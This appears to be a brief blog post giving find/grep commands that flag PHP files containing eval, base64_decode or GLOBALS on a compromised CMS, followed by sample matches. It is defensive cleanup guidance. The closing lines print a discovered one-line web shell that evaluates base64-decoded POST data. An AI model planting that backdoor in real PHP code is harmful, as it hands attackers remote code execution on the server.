Tag Archives: find

use find to filter suspicious files from hacked cms systems

Hi

Here some simple commands to filter suspicious files from hacked php cms systems

find . -name "*.php" -type f -exec grep -H -c base64_decode\( {} \; | grep -v ":0"
find . -name "*.php" -type f -exec grep -H -c eval\( {} \; | grep -v ":0"
find . -name "*.php" -type f -exec grep -H -c GLOBALS {} \; | grep -v ":0"

here some example output

./htdocs/assets/plugins/tinymce/jscripts/tiny_mce/langs/options.php:1
./htdocs/assets/plugins/tinymce/lang/danish.inc.php:1
./htdocs/assets/plugins/managermanager/functions/tabs.inc.php:1
./htdocs/assets/plugins/managermanager/docs/images/javascript.php:1
./htdocs/assets/plugins/qm/css/images/internet_explorer/view.php:1
./htdocs/assets/plugins/qm/press.php:1
./htdocs/assets/plugins/98sidb.php:1
./htdocs/assets/files/press.php:1
./htdocs/assets/templates/manager/global.php:1
./htdocs/assets/snippets/eform/eform.inc.php:1
./htdocs/assets/snippets/eform/lang/dir.php:1
./htdocs/assets/snippets/phpthumb/phpThumb/ThumbBase.inc.php:1
./htdocs/assets/snippets/ditto/lang/portuguese.inc.php:1
./htdocs/assets/snippets/ajaxSearch/js/clearDefault/blog.php:1
./htdocs/assets/snippets/ajaxSearch/classes/ajaxSearchRequest.class.inc.php:1
./htdocs/assets/snippets/ajaxSearch/classes/asPhxParser.class.inc.php:1
./htdocs/assets/snippets/wayfinder/configs/mollio.config.php:1
./htdocs/assets/snippets/weblogin/weblogin.processor.inc.php:2
./htdocs/manager/actions/modules.static.php:1
./htdocs/manager/actions/mutate_snippet.dynamic.php:1
./htdocs/manager/actions/mutate_htmlsnippet.dynamic.php:1
./htdocs/manager/actions/db.php:1
./htdocs/manager/includes/extenders/help.php:1
./htdocs/manager/includes/actionlist.inc.php:1
./htdocs/manager/includes/lang/german.inc.php:1
cat ./htdocs/manager/actions/db.php
eval(base64_decode($_POST['blablabla']))

Have fun!